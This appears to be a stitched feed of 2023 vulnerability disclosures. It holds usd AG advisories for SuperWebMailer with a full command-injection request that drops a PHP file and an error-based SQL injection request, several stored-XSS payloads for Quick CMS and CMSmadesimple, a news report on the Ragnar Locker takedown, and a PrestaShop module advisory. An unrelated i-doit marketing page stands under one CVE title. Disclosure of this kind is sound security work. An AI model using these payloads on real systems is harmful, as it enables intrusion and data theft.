An issue was discovered in SuperWebMailer 9.00.0.01710. It allows Remote Code Execution via a crafted sendmail command line.

**usd-2023-0015 | RCE in SuperWebMailer**

**Advisory ID**: usd-2023-0015  
**Product**: SuperWebMailer  
**Affected Version**: 9.00.0.01710  
**Vulnerability Type**: CWE-77: Improper Neutralization of Special Elements used in a Command ('Command Injection')  
**Security Risk**: CRITICAL  
**Vendor URL**: https://www.superwebmailer.de  
**Vendor acknowledged vulnerability**: No  
**Vendor Status**: Not fixed  
**CVE number**: CVE-2023-38193  
**CVE Link**: Pending

**Desciption**

SuperWebMailer is an online application for managing e-mail newsletters. An authenticated command injection vulnerability was discovered during an engagement. In a command injection attack, an attacker provides a malicious input which is passed by the application to the system and then executed.

The application allows to configure different methods to send outgoing e-mail. One of the available options is to configure sendmail. The user interface provides inputs for the path and the arguments to the sendmail binary. These inputs are accepted from the user without any encoding or filtering being applied. Consequently, an attacker may provide inputs that alter the intended effects of the sendmail command.

**Proof of Concept**

First, login with a user with the privileges to create or modify "Versandvarianten". A new "Versandvariante" can be created by navigating to "Einstellungen -> Versandvarianten -> Neue Versandvariante anlegen". The following screenshot shows a possible malicious payload that creates a php file in a user-readable location.  

The corresponding request is:

POST /mtaedit.php HTTP/2Host: swm.example.comCookie: PHPSESSID=8k8n7rmlnugo73d3jjtaeantft; SuperWebMailer=161kd4lr0kv8qplkknm927u0cs; smlswmCsrfToken=20mqIe2UqIA2ya6ImiqaYM2Q6EuYy6y6ya2QUa; ckCsrfToken=owDltMAWfNyS6UeMRck4tE3kPhfh4qaTr6QkSLAQUser-Agent: Mozilla/5.0 (X11; Linux x86\_64; rv:102.0) Gecko/20100101 Firefox/102.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,\*/\*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedContent-Length: 556smlswmCsrfToken\=20mqIe2UqIA2ya6ImiqaYM2Q6EuYy6y6ya2QUa&MTAId\=3&Name\=sendmail+test&Type\=sendmail&MailLimit\=0&MTASenderEMailAddress\=&sendmail\_path\=%2Fusr%2Fsbin%2Fsendmail&sendmail\_args\=\-i%3B+echo+%27PD9waHAgcGhwaW5mbygpOyA%2FPg%3D%3D%27+%7C+base64+-d+-+%7C+tee+%2Fvar%2Fwww%2Fhtml%2Fuserfiles%2F2%2Ftest-phpinfo.php%3B+cat&savetodir\_pathname\=&SleepInMailSendingLoop\=0&SMIMEMessageAsPlainText\=1&SMIMESignCert\=&SMIMESignPrivKey\=&SMIMESignPrivKeyPassword\=&SMIMESignExtraCerts\=&DKIMSelector\=&DKIMPrivKey\=&DKIMPrivKeyPassword\=&SubmitBtn\=%C3%84nderungen+speichern

The payload may be triggered by testing the newly created Versandvariante via the overview screen.  

The created file is accessible under the path specified in the payload.  

**Fix**

It is recommended that all input to an application is seen as potentially dangerous and thus filter input on the server-side.  
Where possible, an allowlist should be used for filtering.  
Additionally, it is recommended to utilize a programming language's APIs instead of directly issuing system or shell commands.  
Generally, all services should run with minimal required system privileges and users should have minimal required application privileges (least privilege).

**References**

https://cwe.mitre.org/data/definitions/77.html  
https://owasp.org/www-community/attacks/Command\_Injection

**Timeline**

*   **2022-09-26**: This vulnerability was discovered by Florian Dewald and Gerbert Roitburd of usd AG.
*   **2023-04-20**: First contact request via info@superwebmailer.de.
*   **2023-05-08**: Reminder sent via info@superwebmailer.de and contact form.
*   **2023-05-15**: Second reminder to webmaster@wt-rate.com and info@superwebmailer.de.
*   **2023-05-25**: Another reminder sent to info@superwebmailer.de, webmaster@wt-rate.com and info@wt-rate.com
*   **2023-06-05**: Once more tried to inform the company of the vulnerabilities via the feedback form (info@superwebmailer.de).
*   **2023-07-17**: Sent another email to info@supermailer.de, webmaster@wt-rate.com, info@wt-rate.com and info@superwebmailer.de, stressing that CVEs are assigned to the vulnerabilities and disclosure may happen in case we do not receive an answer soon.
*   **2023-08-17**: As the vulnerabilities were found during a pentest, the customer was asked whether or not the Responsible Disclosure Team should move forward without the software vendor's cooperation.
*   **2023-10-02**: Final notice given to info@superwebmailer, warning of immenent disclosure should there be no response within a week.
*   **2023-10-20**: Vulnerabilities disclosed by usd AG.

**Credits**

This security vulnerability was identified by Florian Dewald and Gerbert Roitburd of usd AG.

CVE-2023-38193: usd-2023-0015 - usd HeroLab

An issue was discovered in SuperWebMailer 9.00.0.01710. It allows Export SQL Injection via the size parameter.

**usd-2023-0014 | SQL Injection in SuperWebMailer**

**Advisory ID**: usd-2023-0014  
**Product**: SuperWebMailer  
**Affected Version**: 9.00.0.01710  
**Vulnerability Type**: CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')  
**Security Risk**: HIGH  
**Vendor URL**: https://www.superwebmailer.de  
**Vendor acknowledged vulnerability**: No  
**Vendor Status**: Not fixed  
**CVE number**: CVE-2023-38190  
**CVE Link**: Pending

**Desciption**

SuperWebMailer is an online application for managing e-mail newsletters.  
An authenticated SQL injection vulnerability was discovered during an engagement.  
In an SQL injection attack, a malicious input is used to alter the queries the application sends to an SQL server.

The application contains an export functionality that is vulnerable to an SQL injection attack.  
This functionality uses a **size** parameter provided by the user inside an SQL query without any encoding or filtering being applied.  
Consequently, an attacker may alter the SQL query in unintended ways.

**Proof of Concept**

The following request contains an SQL injection payload that displays the database version:

POST /exportrecipients.php HTTP/2Host: swm.example.comCookie: PHPSESSID=8ko13lk184llt0rqop2pikbf55; smlswmCsrfToken=20YyMEiUeMAYAEA22yeme6EAYEeIM2UqiqIMiEUser-Agent: Mozilla/5.0 (X11; Linux x86\_64; rv:102.0) Gecko/20100101 Firefox/102.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,\*/\*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedContent-Length: 393smlswmCsrfToken\=20YyMEiUeMAYAEA22yeme6EAYEeIM2UqiqIMiE&OneMailingListId\=1&MailingListName\=Test+Empf%C3%A4ngerliste&step\=4&Separator\=%2C&Header1Line\=1&AddQuotes\=1&ExportLines\=200&OnlyActiveRecipients\=&GroupsOption\=1&groups\=&fields%5Bu\_EMail%5D\=1&fields%5Bu\_FirstName%5D\=1&fields%5Bu\_LastName%5D\=1&start\=1,1+procedure+analyse(extractvalue(rand(),concat(0x3a,version())),1)%3b%23&ExportRowCount\=5

The database version is printed in the response as part of an error message:

HTTP/2 200 OKServer: openrestyDate: Sun, 25 Sep 2022 16:48:39 GMTContent-Type: text/html; charset=utf-8Content-Length: 16149Expires: Mon, 26 Jul 1997 05:00:00 GMTCache-Control: no-store, no-cache, must-revalidate, max-age=0Last-Modified: Sun, 25 Sep 2022 16:48:39 GMTPragma: no-cacheX-Frame-Options: SAMEORIGINCache-Control: post-check=0, pre-check=0Vary: Accept-EncodingX-Served-By: swm.example.com\[...\]                <td colspan\="2"\><b\>SQL-Fehler:</b\>&nbsp;XPATH syntax error: ':10.5.15-MariaDB-0+deb11u1' 1105<br /><br />                                <b\>SQL-Anweisung:</b\>&nbsp;SELECT DISTINCT u\_EMail, u\_FirstName, u\_LastName, \*\*testempfngerliste\_members\*\*.\*\*id\*\* FROM \*\*testempfngerliste\_members\*\*   ORDER BY id LIMIT 1,1 procedure analyse(extractvalue(rand(),concat(0x3a,version())),1);#, 200<br /><br /></td\>\[...\]</body\></html\>

**Fix**

SQL injection vulnerabilities can be prevented by using prepared statements with parameterized queries. Additionally, all input to the application should be treated as potentially dangerous and consequently validated on the server-side.

**References**

https://cwe.mitre.org/data/definitions/89.html  
https://owasp.org/www-community/attacks/SQL\_Injection

**Timeline**

*   **2022-09-26**: This vulnerability was discovered by Florian Dewald and Gerbert Roitburd of usd AG.
*   **2023-04-20**: First contact request via info@superwebmailer.de.
*   **2023-05-08**: Reminder sent via info@superwebmailer.de and contact form.
*   **2023-05-15**: Second reminder to webmaster@wt-rate.com and info@superwebmailer.de.
*   **2023-05-25**: Another reminder sent to info@superwebmailer.de, webmaster@wt-rate.com and info@wt-rate.com
*   **2023-06-05**: Once more tried to inform the company of the vulnerabilities via the feedback form (info@superwebmailer.de).
*   **2023-07-17**: Sent another email to info@supermailer.de, webmaster@wt-rate.com, info@wt-rate.com and info@superwebmailer.de, stressing that CVEs are assigned to the vulnerabilities and disclosure may happen in case we do not receive an answer soon.
*   **2023-08-17**: As the vulnerabilities were found during a pentest, the customer was asked whether or not the Responsible Disclosure Team should move forward without the software vendor's cooperation.
*   **2023-10-02**: Final notice given to info@superwebmailer, warning of immenent disclosure should there be no response within a week.
*   **2023-10-20**: Vulnerabilities disclosed by usd AG.

**Credits**

This security vulnerability was identified by Florian Dewald and Gerbert Roitburd of usd AG.

CVE-2023-38190: usd-2023-0014 - usd HeroLab

I-doit pro 25 and below is vulnerable to Cross Site Scripting (XSS) via index.php.

**Das gute Gefühl, wenn aus Daten wertvolles Wissen wird.****i-doit pro - Die führende IT-Dokumentation & CMDB**

**Case Stories****i-doit pro im Einsatz**

Viele Unternehmen setzen bereits i-doit für die Dokumentation ihrer IT ein – vom spezialisierten IT-Dienstleister bis zum Konzern. Einige der Projekte stellen wir Ihnen hier vor.

Jetzt mehr erfahren ->

**doITbetter Conference****am 14.03.2024 in Düsseldorf**

Wir laden Euch zu einer großartigen doITbetter Conference 2024 ein - hier im Hyatt Regency im Düsseldorfer Medienhafen und direkt in Sichtweite gegenüber in unseren Büroräumen.

Zur Registrierung ->

**Best of 2023****i-doit pro ist ausgezeichnet**

Die Jury von der _initiative Mittelstand_ hat i-doit pro mit dem Prädikat BEST OF 2023 ausgezeichnet. Über den Ausgang des Votings entscheiden die Leser. 

Bewerten Sie i-doit pro ->

**Case Story****Max-Planck-Institut für Plasmaphysik**

Eines der größten Projekte im Bereich Kernfusionsforschung - ASDEX Upgrade - nutzt i-doit pro, um technische Anlagen zu inventarisieren und zu managen. 

Zur Case Story ->

**Jetzt 10% sparen!****Die i-doit pro Herbstaktion**

Hier fallen nicht nur die Blätter, sondern auch unsere Preise. Jetzt i-doit pro für zwei Jahre sichern und 10% sparen. Und dazu gibt es noch ein kostenfreies i-doit pro Add-on.

Jetzt Rabatt sichern ->

**14.03.2023****Die doITbetter Conference '24**

Jetzt schnell Early Bird Tickets sichern. Die schnellsten Anmeldungen haben die Chance, am exklusiven Abendessen im Hyatt Regency teilzunehmen.

Jetzt Tickets reservieren ->

**Das ist i-doit pro**

**Kostengünstig**

Mit i-doit pro sparen Sie Zeit und Geld. Sie bezahlen nur das, was Sie auch wirklich brauchen.

**Einsatzbereit**

Installieren und loslegen. Teure Einführungsprojekte gehören der Vergangenheit an.

**Faire Lizenzierung**

Die Größe der Lizenz orientiert sich ausschließlich an dem, was Sie benötigen. Nicht mehr.

**Erweiterbar**

Fügen Sie nach Bedarf Funktionen hinzu und schaffen Sie das System, das Sie wirklich unterstützt.

**Ihr Unternehmen ist einzigartig!**

Sie verwalten individuelle Strukturen und Prozesse. Und Sie haben eigene Erwartungen an eine IT-Dokumentation. Warum sollten Sie also eine Lösung "von der Stange" wählen?

i-doit pro unterstützt Ihre Einzigartigkeit durch seine Flexibilität. Sie passen das System Ihren Prozessen an, nicht umgekehrt. Und das in allen Unternehmen bis hin zum internationalen Konzern.

Jetzt mehr erfahren->

**Das Wissen Ihrer IT zentral gespeichert.**

Bündeln Sie das Wissen Ihrer IT an einem zentralen Ort. i-doit pro ist viel mehr als eine IT-Dokumentation. i-doit pro ist eine IT-Management Software.

Sie sehen sofort, wo sich ein Gerät befindet und wer dafür zuständig ist. Wichtige Dokumente sind mit einem Klick verfügbar. Die zeitintensive Suche nach wichtigen Informationen gehört der Vergangenheit an.

Erfahren Sie mehr über i-doit pro ->

**Die CMDB****Die Basis für das IT Service Management**

Über integrierte Schnittstellen verbinden Sie weitere Systeme mit der CMDB. Daten aus Monitoring, Discovery und Help Desk fließen zusammen.

Mit i-doit pro optimieren und automatisieren Sie Ihre Geschäftsprozesse. Sie gelangen zu effizienten digitalen Prozessen mit IT Service Management (ITSM).

Mehr zum Thema IT Service Management ->

**Die Add-ons****Die flexible IT-Management-Lösung**

Starten Sie direkt mit Ihrem Dokumentationsprojekt. Alle Funktionen stehen Ihnen von Anfang an zur Verfügung. Die verfügbaren i-doit pro Add-Ons erweitern Ihre IT-Dokumentation.

So wird i-doit pro Ihre individuelle CMDB-Lösung. Sie fügen nur die Funktionalitäten hinzu, die Sie wirklich benötigen. Die Abhängigkeit von Systemen "von der Stange" entfällt.

Finden Sie das passende i-doit pro Add-on ->

**Unser Themenschwerpunkt****Information Security Management mit i-doit pro**

**ISO27001 Zertifizierung  
mit i-doit pro**

Bereiten Sie sich zielsicher auf die Zertifizierung vor. Mit i-doit pro und seinen verfügbaren Add-ons erhalten Sie eine vollständige ISMS-Suite für höchste Ansprüche, die variabel auf neue Anforderungen angepasst werden kann.

ISO 27001 Zertifizierung mit i-doit pro ->

**Die i-doit  
Compliance Suite**

Die i-doit Compliance Suite vereint ISMS, Datenschutz und Change Management und unterstützt Sie maßgeblich bei der Vorbereitung und Umsetzung eines vollständigen Sicherheits-Managements. 

Testen Sie die i-doit Compliance Suite ->

**IT-Sicherheit mit System.  
Das i-doit ISMS**

Die Norm ISO 27001 beschreibt die Anforderungen an ein Information Security Management System (ISMS). Aber was ein ISMS? Und warum benötigt es ein Großteil der Unternehmen?

Mehr zum Thema ISMS ->

**Neues aus dem doITbetter Blog**

**Einige unserer über 1.600 Kunden**

**Professionelle Unterstützung  
durch unsere i-doit-Partner**

Wir lassen Sie nicht allein mit Ihrem Projekt. Unsere Partner verfügen nicht nur über umfangreiche Projekterfahrung mit i-doit pro, sondern stellen Ihnen auch eine fundierte Wissensbasis im Bereich der IT-Dokumentation zur Verfügung. Unsere Partner setzen Ihr i-doit-Projekt um, unterstützen Sie bei Fragen und Problemen und entwickeln bei Bedarf neue Funktionalitäten – auch für Ihre besonderen Anwendungsfälle.

Die Unternehmenskultur der synetics GmbH profitiert seit vielen Jahren von einem diversen, multikulturellen und vielfältigen Team. Zum Zwecke einer einfachen Lesbarkeit unserer Inhalte haben wir uns dennoch dazu entschieden, auf unserer Website überwiegend das generische Maskulinum zu verwenden. Das bedeutet keine Wertung, denn wir sind stolz darauf, Menschen mit vielen unterschiedlichen Hintergründen und Geschichten in einer gemeinsamen Vision zusammenzubringen.

CVE-2023-46003: i-doit pro - IT-Dokumentation & CMDB

Cross-site scripting (XSS) vulnerability in opensolution Quick CMS v.6.7 allows a local attacker to execute arbitrary code via a crafted script to the Backend - Dashboard parameter in the Languages Menu component.

**Quick CMS Stored XSS v6.7****Author: (Sergio)**

**Description:** A Cross-Site Scripting (XSS) vulnerability in Quick CMS v6.7 allows a local attacker to execute arbitrary code via a crafted script to the to the Backend - Dashboard in the Languages Menu.

**Attack Vectors:** Scripting A vulnerability in the sanitization of the entry in the Backend of "Languages- Backend" allows injecting JavaScript code that will be executed when the user accesses the web page.

**POC:**

When logging into the panel, we will go to the "Languages - Backend ." section off General Menu.

We edit that Backend Settings and see that we can inject arbitrary Javascript code in the Dashboard field.

**XSS Payload:**

'"><svg/onload=alert('Dashboard')\>

In the following image you can see the embedded code that executes the payload in the main web.

  
**Additional Information:**

https://opensolution.org/cms-system-quick-cms.html

https://owasp.org/Top10/es/A03\_2021-Injection/

CVE-2023-43346: GitHub - sromanhu/CVE-2023-43346-Quick-CMS-Stored-XSS---Languages-Backend: Quick CMS 6.7 is affected by a Cross-Site Scripting (XSS) vulnerability that allows attackers to execute arbitrary code via a

Cross Site Scripting vulnerability in CMSmadesimple v.2.2.18 allows a local attacker to execute arbitrary code via a crafted script to the Profiles parameter in the Extensions -MicroTiny WYSIWYG editor component.

**CMSmadesimple Stored XSS v2.2.18****Author: (Sergio)**

**Description:** Cross Site Scripting vulnerability in CMSmadesimple v.2.2.18 allows a local attacker to execute arbitrary code via a crafted script to the Profiles in the Extensions - MicroTiny WYSIWYG editor.

**Attack Vectors:** Scripting A vulnerability in the sanitization of the entry in the Profiles of "MicroTiny WYSIWYG editor" allows injecting JavaScript code that will be executed when the user accesses the web page.

**POC:**

When logging into the panel, we will go to the "Extensions- MicroTiny WYSIWYG editor." section off General Menu.

We edit that MicroTiny WYSIWYG edito Menu with the payload that we have created and see that we can inject arbitrary Javascript code in the Profile field.

**XSS Payload:**

""\><svg/onload\=alert('Profile')\>

In the following image you can see the embedded code that executes the payload in the main web. 

  
**Additional Information:**

http://www.cmsmadesimple.org/

https://owasp.org/Top10/es/A03\_2021-Injection/

CVE-2023-43354: GitHub - sromanhu/CVE-2023-43354-CMSmadesimple-Stored-XSS---MicroTIny-extension: Cross Site Scripting vulnerability in CMSmadesimple v.2.2.18 allows a local attacker to execute arbitrary code via a cr

Cross Site Scripting vulnerability in CMSmadesimple v.2.2.18 allows a local attacker to execute arbitrary code via a crafted script to the Title parameter in the Manage Shortcuts component.

**CMSmadesimple Stored XSS v2.2.18****Author: (Sergio)**

**Description:** Cross Site Scripting vulnerability in CMSmadesimple v.2.2.18 allows a local attacker to execute arbitrary code via a crafted script to the Title in the My Preferences - Manage Shortcuts

**Attack Vectors:** Scripting A vulnerability in the sanitization of the entry in the Title of "My Preferences - Manage Shortcuts" allows injecting JavaScript code that will be executed when the user accesses the web page.

**POC:**

When logging into the panel, we will go to the "My Preferences - Manage Shortcuts" section off General Menu.

We edit that Content - News Menu with the payload that we have created and see that we can inject arbitrary Javascript code in the Title field.

**XSS Payload:**

'"><svg/onload=alert('Title')\>

In the following image you can see the embedded code that executes the payload in the main web. 

  
**Additional Information:**

http://www.cmsmadesimple.org/

https://owasp.org/Top10/es/A03\_2021-Injection/

CVE-2023-43357: GitHub - sromanhu/CVE-2023-43357-CMSmadesimple-Stored-XSS---Shortcut: Cross Site Scripting vulnerability in CMSmadesimple v.2.2.18 allows a local attacker to execute arbitrary code via a crafted scrip

Cross Site Scripting vulnerability in CMSmadesimple v.2.2.18 allows a local attacker to execute arbitrary code via a crafted script to the Global Meatadata parameter in the Global Settings Menu component.

**CMSmadesimple Stored XSS v2.2.18****Author: (Sergio)**

**Description:** Cross Site Scripting vulnerability in CMSmadesimple v.2.2.18 allows a local attacker to execute arbitrary code via a crafted script to the Global Meatadata in the Settings- Global Settings Menu.

**Attack Vectors:** Scripting A vulnerability in the sanitization of the entry in the Global Meatadata of "Settings- Global Settings Menu" allows injecting JavaScript code that will be executed when the user accesses the web page.

**POC:**

When logging into the panel, we will go to the "Settings- Global Settings Menu." section off General Menu.

We edit that Global Settings Menu that we have created and see that we can inject arbitrary Javascript code in the Global Meatadata field.

**XSS Payload:**

<img src\=1 onerror\=alert("1")

In the following image you can see the embedded code that executes the payload in the main web. 

  
**Additional Information:**

http://www.cmsmadesimple.org/

https://owasp.org/Top10/es/A03\_2021-Injection/

CVE-2023-43356: GitHub - sromanhu/CVE-2023-43356-CMSmadesimple-Stored-XSS---Global-Settings: Cross Site Scripting vulnerability in CMSmadesimple v.2.2.18 allows a local attacker to execute arbitrary code via a crafte

Cross Site Scripting vulnerability in CMSmadesimple v.2.2.18 allows a local attacker to execute arbitrary code via a crafted script to the extra parameter in the news menu component.

**CMSmadesimple Stored XSS v2.2.18****Author: (Sergio)**

**Description:** Cross Site Scripting vulnerability in CMSmadesimple v.2.2.18 allows a local attacker to execute arbitrary code via a crafted script to the Extra in the Content - News Menu.

**Attack Vectors:** Scripting A vulnerability in the sanitization of the entry in the Extra of "Content - News Menu" allows injecting JavaScript code that will be executed when the user accesses the web page.

**POC:**

When logging into the panel, we will go to the "Content- News" section off General Menu.

We edit that Content - News Menu with the payload that we have created and see that we can inject arbitrary Javascript code in the Extra field.

**XSS Payload:**

'"><svg/onload=prompt('Extra')\>

In the following image you can see the embedded code that executes the payload in the main web. 

  
**Additional Information:**

http://www.cmsmadesimple.org/

https://owasp.org/Top10/es/A03\_2021-Injection/

CVE-2023-43353: GitHub - sromanhu/CVE-2023-43353-CMSmadesimple-Stored-XSS---News---Extra: Cross Site Scripting vulnerability in CMSmadesimple v.2.2.18 allows a local attacker to execute arbitrary code via a crafted s

By Waqas
Global law enforcement involving 11 countries has shuts down Ragnar Locker ransomware gang.
This is a post from HackRead.com Read the original post: Ragnar Locker Ransomware Gang Dismantled, Key Suspect Arrested, Site Seized

The Ragnar Locker ransomware gang used Facebook ads to extort and terrorize victims, including hospitals.

In a significant international operation, law enforcement agencies from eleven countries have successfully dismantled the notorious **Ragnar Locker ransomware group**. This joint effort, led by Europol and Eurojust, dealt a major blow to a cybercriminal organization responsible for a series of high-profile attacks on critical infrastructure worldwide.

The operation, conducted from October 16th to 20th 2023, involved coordinated searches in Czechia, Spain, and Latvia. The “key suspect” linked to the malicious ransomware strain was apprehended in Paris, France, on October 16, 2023.

Subsequent interviews were conducted with five suspects in Spain and Latvia. At the conclusion of the operation, the alleged mastermind behind the Ragnar group was presented before the examining magistrates of the Paris Judicial Court.

Law enforcement agencies also seized the ransomware’s infrastructure in the Netherlands, Germany, and Sweden, and took down the associated data leak website on Tor in Sweden.

Seizure notice on the official dark web domain of the Discussions about the Ragnar Locker Ransomware Gang (Screenshot credit: Hackread.com).

The investigation, according to Europol’s **press release**, leading to this international operation was a collaborative effort involving the French National Gendarmerie, as well as authorities from Czechia, Germany, Italy, Japan, Latvia, the Netherlands, Spain, Sweden, Ukraine, and the United States. The initial arrests in Ukraine, with support from Europol, occurred in October 2021 as part of this complex investigation.

Ragnar Locker, both the ransomware strain and the criminal group behind it, has been active since December 2019. The group gained fame for targeting critical infrastructure worldwide, including recent attacks on the Portuguese national carrier and an Israeli hospital.

Among the infamous Ragnar Locker ransomware gang’s victims were well-known Japanese video gaming firm **Capcom** and **Energias de Portugal** (EDP), a Portuguese electric company and energy giant. This ransomware specifically targeted Windows devices and often exploited vulnerabilities such as Remote Desktop Protocol for unauthorized access.

Ragnar Locker was known for employing a double extortion tactic, demanding large payments for decryption tools and threatening to release stolen sensitive data. Its focus on critical infrastructure made it a high-level threat.

The group warned victims against contacting law enforcement, threatening to publish stolen data on its dark web ‘Wall of Shame’ leak site. It is worth noting that this is the **same gang that used Facebook ads to extort victims**.

However, law enforcement agencies, including the French Gendarmerie and the US FBI, cooperated with Europol and INTERPOL, leading to the arrest of two prominent Ragnar Locker operators in Ukraine in October 2021. The investigation continued, resulting in the recent arrests and disruption actions.

Discussions about the demise of the Ragnar Locker Ransomware Gang are already underway on a notorious Russian hacker and cybercrime forum (Screenshot credit: Hackread.com).

The Ragnar Locker ransomware gang is just another cybercriminal enterprise to bite the dust. Authorities have successfully seized domains or dismantled the infrastructure of several ransomware groups, including Netwalker, Cl0P, DarkSide, REvil, and Egregor.

1.  Ransomware gang behind attacks on 100+ companies busted
2.  Domain, server of DoubleVPN used by ransomware gangs seized
3.  Alleged Ukrainian Member of REvil Ransomware Gang Extradited to US
4.  WT1SHOP Cybercrime Market Seized by US and Portuguese Authorities
5.  E-Root Marketplace Admin Extradited to US on Computer Fraud Charge

Ragnar Locker Ransomware Gang Dismantled, Key Suspect Arrested, Site Seized

Sitolog sitologapplicationconnect v7.8.a and before was discovered to contain a SQL injection vulnerability via the component /activate_hook.php.

**IMPORTANT NOTICE**: DO NOT REPORT VULNERABILITIES SOLELY TO THE AUTHOR OR MARKETPLACE.

We urge you to report any vulnerabilities directly to us. Our mission is to ensure the safety and security of the PrestaShop ecosystem. Unfortunately, many module developers may not always recognize or acknowledge the vulnerabilities in their code, whether due to lack of awareness, or inability to properly evaluate the associated risk, or other reasons.

Given the rise in professional cybercrime networks actively seeking out these vulnerabilities, it's crucial that any potential threats are promptly addressed and the community is informed. The most effective method to do this is by publishing a CVE, like the one provided below.

Should you discover any vulnerabilities, **please report them to us at: report\[@\]security-presta.org** or visit https://security-presta.org for more information.

Every vulnerability report helps make the community more secure, and we are profoundly grateful for any information shared with us.

In the module “Sitolog Application Connect” (sitologapplicationconnect) from Sitolog for PrestaShop, an anonymous user can perform a SQL injection. **The module is obsolete and must be deleted.**

**Summary**

*   **CVE ID**: CVE-2023-37824
*   **Published at**: 2023-10-11
*   **Platform**: PrestaShop
*   **Product**: sitologapplicationconnect
*   **Impacted release**: <= 7.8.a (ALL VERSIONS)
*   **Product author**: Sitolog
*   **Weakness**: CWE-89
*   **Severity**: critical (9.8)

**Description**

In sitologapplicationconnect module from Sitolog for PrestaShop up to version 7.8.a (all versions), a sensitive SQL call can be executed with a trivial http call and exploited to forge a blind SQL injection.

**WARNING** : This exploit is actively used to deploy a webskimmer to massively steal credit cards.

**This obsolete module has been replaced since 2018 by the new module renamed “Sitolog Connector”.**

Note : the most recent version (currently V9.0) of “Sitolog Connector” is available to download for free for all Sitolog customers on www.sitolog.com. This up to date connector supports all our applications versions.

As a reminder, the 3 older applications PrestaPricing, PrestaCategories and Merlin Backoffice standard are also obsolete (no more update either support) and must be replaced by Merlin Backoffice Flex using more recent technologies (http2 instead of http1, support of PHP8, MySQL above 7.5 …).

**CVSS base metrics**

*   **Attack vector**: network
*   **Attack complexity**: low
*   **Privilege required**: none
*   **User interaction**: none
*   **Scope**: unchanged
*   **Confidentiality**: high
*   **Integrity**: high
*   **Availability**: high

**Vector string**: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

**Possible malicious usage**

*   Technical and personal data leaks
*   Obtain admin access
*   Remove all data of the linked PrestaShop
*   Display sensitives tables to front-office to unlock potential admin’s ajax scripts of modules protected by token on the ecosystem

**Other recommendations**

*   It’s recommended to delete this module and download the new module freely available on www.sitolog.com
*   Upgrade PrestaShop to the latest version to disable multiquery executions (separated by “;”) - be warned that this functionality **WILL NOT** protect your SHOP against injection SQL which uses the UNION clause to steal data.
*   Change the default database prefix ps\_ by a new longer arbitrary prefix. Nevertheless, be warned that this is useless against blackhats with DBA senior skill because of a design vulnerability in DBMS
*   Activate OWASP 942’s rules on your WAF (Web application firewall), be warned that you will probably break your backoffice and you will need to pre-configure some bypasses against these set of rules.

**Timeline**

Date

Action

2022-12-29

Issue discovered after a security audit by TouchWeb

2022-12-29

Contact Author to confirm version scope

2022-12-29

Author confirm version scope

2023-07-08

Request a CVE ID

2023-10-09

Received CVE ID

2023-10-11

Publish this security advisory

Sitolog thanks TouchWeb for its courtesy and its help after the vulnerability disclosure.

**Links**

*   Author product page
*   National Vulnerability Database

**DISCLAIMER:** _The French Association Friends Of Presta (FOP) acts as an intermediary to help hosting this advisory. While we strive to ensure the information and advice provided are accurate, FOP cannot be held liable for any consequences arising from reported vulnerabilities or any subsequent actions taken._

Tag

#web